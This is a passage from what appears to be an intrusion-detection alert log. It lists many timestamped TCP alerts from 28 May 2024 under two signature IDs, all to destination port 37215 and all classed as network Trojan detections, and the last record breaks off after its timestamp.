            Timestamp:05/28/24-09:57:25.945286
            SID:2829579
            Source Port:45024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.527411
            SID:2835222
            Source Port:55812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.601822
            SID:2835222
            Source Port:48450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904178
            SID:2835222
            Source Port:52296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.480910
            SID:2835222
            Source Port:42014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.915907
            SID:2829579
            Source Port:36448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.793997
            SID:2835222
            Source Port:39974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918536
            SID:2835222
            Source Port:58090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066107
            SID:2829579
            Source Port:53098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857943
            SID:2829579
            Source Port:58790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639382
            SID:2835222
            Source Port:52122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855479
            SID:2835222
            Source Port:40252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675418
            SID:2835222
            Source Port:43674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790455
            SID:2835222
            Source Port:36644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862670
            SID:2829579
            Source Port:56618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.107933
            SID:2829579
            Source Port:40134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887354
            SID:2829579
            Source Port:56608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.614885
            SID:2835222
            Source Port:45510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508292
            SID:2835222
            Source Port:40130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.704437
            SID:2835222
            Source Port:34436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067953
            SID:2835222
            Source Port:53828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.809190
            SID:2835222
            Source Port:38614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875549
            SID:2835222
            Source Port:41680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.735522
            SID:2829579
            Source Port:57378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853415
            SID:2829579
            Source Port:33282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806619
            SID:2829579
            Source Port:56248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995892
            SID:2829579
            Source Port:40210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180621
            SID:2835222
            Source Port:47222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559111
            SID:2835222
            Source Port:59418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059098
            SID:2835222
            Source Port:39900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039725
            SID:2829579
            Source Port:34062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905009
            SID:2829579
            Source Port:50566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.860483
            SID:2835222
            Source Port:50704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929879
            SID:2829579
            Source Port:57660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804842
            SID:2835222
            Source Port:37318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.895718
            SID:2829579
            Source Port:44064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.028855
            SID:2829579
            Source Port:59232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764101
            SID:2835222
            Source Port:39782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.687707
            SID:2835222
            Source Port:45778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880701
            SID:2835222
            Source Port:33558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880058
            SID:2835222
            Source Port:43566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772877
            SID:2829579
            Source Port:35378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.325958
            SID:2835222
            Source Port:55010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.956209
            SID:2829579
            Source Port:53650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.720254
            SID:2829579
            Source Port:36576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084521
            SID:2829579
            Source Port:52284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.747159
            SID:2835222
            Source Port:34612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808264
            SID:2829579
            Source Port:37994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279785
            SID:2829579
            Source Port:35508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818897
            SID:2835222
            Source Port:34746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.884590
            SID:2835222
            Source Port:49266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.300015
            SID:2835222
            Source Port:43736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808211
            SID:2829579
            Source Port:54974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972484
            SID:2835222
            Source Port:34740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926996
            SID:2829579
            Source Port:41438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.636259
            SID:2829579
            Source Port:33514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.886028
            SID:2835222
            Source Port:55562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873495
            SID:2829579
            Source Port:42758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.988451
            SID:2829579
            Source Port:53658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734866
            SID:2835222
            Source Port:37204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772437
            SID:2829579
            Source Port:37072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.860571
            SID:2835222
            Source Port:40248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.563744
            SID:2835222
            Source Port:55848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.398141
            SID:2835222
            Source Port:41696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563770
            SID:2835222
            Source Port:59148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850476
            SID:2829579
            Source Port:37362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.523478
            SID:2835222
            Source Port:53516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.013886
            SID:2835222
            Source Port:44950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020176
            SID:2835222
            Source Port:49068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.973929
            SID:2835222
            Source Port:45332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807095
            SID:2835222
            Source Port:43816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.591656
            SID:2835222
            Source Port:43738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435399
            SID:2835222
            Source Port:50636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919011
            SID:2835222
            Source Port:43920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424156
            SID:2835222
            Source Port:44600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559220
            SID:2835222
            Source Port:46918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.633481
            SID:2835222
            Source Port:35996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555159
            SID:2835222
            Source Port:54400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836571
            SID:2835222
            Source Port:36654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.707983
            SID:2829579
            Source Port:44710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575500
            SID:2829579
            Source Port:34888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.070957
            SID:2835222
            Source Port:52768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853437
            SID:2829579
            Source Port:41812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469475
            SID:2829579
            Source Port:37408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957133
            SID:2829579
            Source Port:34026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773683
            SID:2835222
            Source Port:40890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.925243
            SID:2835222
            Source Port:54976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.252218
            SID:2835222
            Source Port:46992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307486
            SID:2835222
            Source Port:37528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597258
            SID:2835222
            Source Port:46914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767910
            SID:2835222
            Source Port:36950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459393
            SID:2829579
            Source Port:36678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999718
            SID:2835222
            Source Port:34076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809448
            SID:2829579
            Source Port:51452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789291
            SID:2829579
            Source Port:52324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260385
            SID:2835222
            Source Port:38292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260446
            SID:2829579
            Source Port:43250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741363
            SID:2835222
            Source Port:59380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881636
            SID:2835222
            Source Port:57142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939258
            SID:2829579
            Source Port:35568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818036
            SID:2835222
            Source Port:49994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061171
            SID:2835222
            Source Port:49350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953406
            SID:2829579
            Source Port:45898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352428
            SID:2829579
            Source Port:53296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816868
            SID:2829579
            Source Port:53922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865936
            SID:2835222
            Source Port:58520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323248
            SID:2835222
            Source Port:34494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.383278
            SID:2829579
            Source Port:49278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805074
            SID:2835222
            Source Port:40624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.092127
            SID:2829579
            Source Port:57978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899653
            SID:2835222
            Source Port:34776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.779947
            SID:2829579
            Source Port:32836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722159
            SID:2835222
            Source Port:53842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040211
            SID:2835222
            Source Port:45948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.729462
            SID:2835222
            Source Port:47026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.441282
            SID:2829579
            Source Port:37064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581069
            SID:2829579
            Source Port:49578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542412
            SID:2829579
            Source Port:60330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.051873
            SID:2829579
            Source Port:59942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789216
            SID:2835222
            Source Port:60886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.380636
            SID:2829579
            Source Port:52958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000912
            SID:2829579
            Source Port:49710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995592
            SID:2835222
            Source Port:38646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.159083
            SID:2829579
            Source Port:32930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873349
            SID:2835222
            Source Port:40374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772080
            SID:2835222
            Source Port:39650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877576
            SID:2835222
            Source Port:57298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.443712
            SID:2829579
            Source Port:33982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810707
            SID:2829579
            Source Port:59144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767091
            SID:2829579
            Source Port:50692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808869
            SID:2829579
            Source Port:56008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760201
            SID:2835222
            Source Port:52066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864904
            SID:2835222
            Source Port:49620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052970
            SID:2829579
            Source Port:53816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276707
            SID:2829579
            Source Port:48558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984905
            SID:2835222
            Source Port:60182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.565587
            SID:2829579
            Source Port:44570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864545
            SID:2835222
            Source Port:33750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.909930
            SID:2829579
            Source Port:49076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.854508
            SID:2835222
            Source Port:38086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840123
            SID:2829579
            Source Port:33342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.899182
            SID:2835222
            Source Port:51086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810086
            SID:2835222
            Source Port:49596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.484421
            SID:2829579
            Source Port:54852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713189
            SID:2829579
            Source Port:55998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.305555
            SID:2829579
            Source Port:32772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809754
            SID:2829579
            Source Port:50172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765735
            SID:2835222
            Source Port:59812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865977
            SID:2835222
            Source Port:48156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854862
            SID:2829579
            Source Port:48752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941692
            SID:2835222
            Source Port:38622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933909
            SID:2835222
            Source Port:37266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077848
            SID:2829579
            Source Port:41734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506977
            SID:2835222
            Source Port:35014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.725636
            SID:2835222
            Source Port:33930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.668196
            SID:2829579
            Source Port:38466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855546
            SID:2835222
            Source Port:57946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899780
            SID:2835222
            Source Port:60726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827931
            SID:2835222
            Source Port:56940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779025
            SID:2835222
            Source Port:54862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002959
            SID:2835222
            Source Port:56358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376421
            SID:2835222
            Source Port:46686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.193294
            SID:2835222
            Source Port:39948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.477643
            SID:2829579
            Source Port:55122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505690
            SID:2829579
            Source Port:52562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910478
            SID:2829579
            Source Port:35978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084795
            SID:2835222
            Source Port:39634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.294641
            SID:2829579
            Source Port:38280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832265
            SID:2835222
            Source Port:50494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895914
            SID:2829579
            Source Port:60438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735552
            SID:2829579
            Source Port:51012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776319
            SID:2829579
            Source Port:33592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374060
            SID:2829579
            Source Port:60438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537312
            SID:2835222
            Source Port:40576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.631748
            SID:2835222
            Source Port:52914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714885
            SID:2835222
            Source Port:42740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.382605
            SID:2835222
            Source Port:39948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541669
            SID:2835222
            Source Port:49574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990591
            SID:2835222
            Source Port:42974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969163
            SID:2835222
            Source Port:58414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065433
            SID:2835222
            Source Port:43672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.388387
            SID:2829579
            Source Port:46720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541438
            SID:2835222
            Source Port:46944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900682
            SID:2835222
            Source Port:34960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.962765
            SID:2835222
            Source Port:46388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.284462
            SID:2835222
            Source Port:55234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563490
            SID:2829579
            Source Port:56364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.107986
            SID:2829579
            Source Port:44814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929036
            SID:2835222
            Source Port:37130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.746141
            SID:2829579
            Source Port:52306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.016046
            SID:2835222
            Source Port:40438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.891566
            SID:2835222
            Source Port:41748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.808301
            SID:2835222
            Source Port:45744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846639
            SID:2829579
            Source Port:55240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771323
            SID:2835222
            Source Port:46520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507433
            SID:2829579
            Source Port:52822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.404090
            SID:2829579
            Source Port:34482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.792718
